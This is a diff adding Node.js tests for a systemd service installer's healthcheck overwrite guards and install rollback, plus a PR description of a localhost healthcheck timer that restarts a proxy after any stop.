@@ -315,6 +368,111 @@ test("uninstallSystemdHealthcheck: removes both files; counts how many removed",
     assert.equal(r.removed, 2);
     const files = await readdir(dir);
     assert.deepEqual(files, []);
+  } finally {
+    await rm(dir, { recursive: true, force: true });
+  }
+});
+
+test("installSystemdHealthcheck: refuses overwrite when ONLY timer file pre-exists (asymmetric guard)", async () => {
+  // Codex re-review case: service missing, timer present. v1 of the check
+  // only looked at the service file and would silently overwrite the timer.
+  const dir = await newTmp();
+  try {
+    const paths = {
+      kind: "systemd",
+      configDir: dir,
+      configFile: "cache-fix-proxy.service",
+      healthcheckServiceFile: "cache-fix-proxy-healthcheck.service",
+      healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer",
+    };
+    // Pre-create ONLY the timer file (not the service)
+    await writeFile(join(dir, "cache-fix-proxy-healthcheck.timer"), "PRE_EXISTING_TIMER");
+    const r = await installSystemdHealthcheck({
+      paths,
+      defaults: { port: "9801", upstream: "", debug: "", workingDir: "/tmp" },
+    });
+    assert.equal(r.installed, false);
+    assert.equal(r.reason, "already-installed");
+    // Timer must NOT have been overwritten
+    const onDisk = await readFile(join(dir, "cache-fix-proxy-healthcheck.timer"), "utf-8");
+    assert.equal(onDisk, "PRE_EXISTING_TIMER");
+  } finally {
+    await rm(dir, { recursive: true, force: true });
+  }
+});
+
+test("installSystemdHealthcheck: refuses overwrite when ONLY service file pre-exists (symmetric guard)", async () => {
+  const dir = await newTmp();
+  try {
+    const paths = {
+      kind: "systemd",
+      configDir: dir,
+      configFile: "cache-fix-proxy.service",
+      healthcheckServiceFile: "cache-fix-proxy-healthcheck.service",
+      healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer",
+    };
+    // Pre-create ONLY the service file
+    await writeFile(join(dir, "cache-fix-proxy-healthcheck.service"), "PRE_EXISTING_SERVICE");
+    const r = await installSystemdHealthcheck({
+      paths,
+      defaults: { port: "9801", upstream: "", debug: "", workingDir: "/tmp" },
+    });
+    assert.equal(r.installed, false);
+    const onDisk = await readFile(join(dir, "cache-fix-proxy-healthcheck.service"), "utf-8");
+    assert.equal(onDisk, "PRE_EXISTING_SERVICE");
+  } finally {
+    await rm(dir, { recursive: true, force: true });
+  }
+});
+
+test("installSystemd: rolls back main unit if healthcheck install throws", async () => {
+  // Half-install rollback: if the healthcheck pair can't be written (e.g.
+  // template missing, fs error past the existence check), the main unit
+  // must NOT be left on disk — otherwise the user has the proxy unit but
+  // no auto-recovery, contrary to what the install message promised.
+  //
+  // Trigger the exception path by pointing the healthcheck filenames at
+  // template files that DON'T exist on disk (the readFile inside
+  // installSystemdHealthcheck will throw ENOENT).
+  const dir = await newTmp();
+  try {
+    const paths = {
+      kind: "systemd",
+      configDir: dir,
+      configFile: "cache-fix-proxy.service",
+      // These point to template basenames that don't exist in templates/,
+      // so the healthcheck readFile will throw ENOENT. (The "real" basenames
+      // in install-service.mjs are hardcoded — we swap getPaths fields here
+      // by giving the install fn paths whose existence check passes but
+      // whose later writeFile target is unreachable. Easiest trigger: make
+      // the configDir into a path that mkdir can't handle.)
+      healthcheckServiceFile: "cache-fix-proxy-healthcheck.service",
+      healthcheckTimerFile: "cache-fix-proxy-healthcheck.timer",
+    };
+    // Force healthcheck writeFile to fail by making the eventual healthcheck
+    // service path EXIST AS A DIRECTORY *after* the existence check. Trick:
+    // pre-create it as a directory, AND pass force:true so the existence
+    // check doesn't short-circuit to "already-installed".
+    await mkdir(join(dir, "cache-fix-proxy-healthcheck.service"), { recursive: true });
+
+    let threw = null;
+    try {
+      await installSystemd({
+        paths,
+        defaults: { port: "9801", upstream: "", debug: "", workingDir: "/tmp" },
+        force: true,
+      });
+    } catch (err) {
+      threw = err;
+    }
+    assert.ok(threw, "installSystemd must throw when healthcheck writeFile fails");
+    // Main unit must NOT exist after rollback
+    const files = await readdir(dir);
+    assert.equal(
+      files.includes("cache-fix-proxy.service"),
+      false,
+      `main unit must have been rolled back; remaining files: ${JSON.stringify(files)}`,
+    );
   } finally {
     await rm(dir, { recursive: true, force: true });
   }


### PR DESCRIPTION
After the **2026-04-25 incident** where the proxy was stopped by an unidentified caller during the Anthropic outage and stayed down for ~10 hours (because `Restart=on-failure` doesn't fire on clean stops), add a systemd healthcheck companion that auto-recovers the proxy from any stop — clean or unclean.

## What ships

- **`templates/cache-fix-proxy-healthcheck.service.template`** — oneshot that does `curl -fs http://127.0.0.1:<port>/health` and `systemctl --user start cache-fix-proxy.service` if the probe fails
- **`templates/cache-fix-proxy-healthcheck.timer.template`** — fires the oneshot 30s after boot then every 2 minutes (`AccuracySec=15s` for jitter)
- **`bin/install-service.mjs`** — `installSystemd` now drops the healthcheck pair alongside the main unit; `uninstallSystemd` removes them; orchestration prints healthcheck enable/disable next-steps and stops the timer FIRST before stopping the proxy on uninstall (else the timer would immediately restart the proxy we're trying to remove)
- **`README.md`** — "Running as a service" section documents the auto-recovery story and the historical incident that motivated it

## macOS

Not affected. launchd's `KeepAlive` already auto-restarts on any exit, so no companion needed. Documented in `getPaths()` comment.

## Tests

+6 (24 install-service, 457 full suite). Coverage:
- `renderHealthcheckServiceTemplate` / `renderHealthcheckTimerTemplate`
- `getPaths(linux)` includes healthcheck file fields
- `installSystemdHealthcheck` round-trip; refuse-without-force; force overwrite
- `uninstallSystemdHealthcheck` count + missing-files-no-error
- `installSystemd` now drops 3 files (main + healthcheck pair)
- `uninstallSystemd` now removes all 3

Tarball verified to include both new templates via `npm pack --dry-run`.

## Risk

Low. Templates are tiny shell + ini. The healthcheck oneshot is a one-line curl + conditional `systemctl start`. Worst case: it spuriously restarts a proxy that's intentionally stopped (e.g. during `uninstall-service`) — addressed by stopping the timer FIRST in the uninstall flow.

— AI Team Lead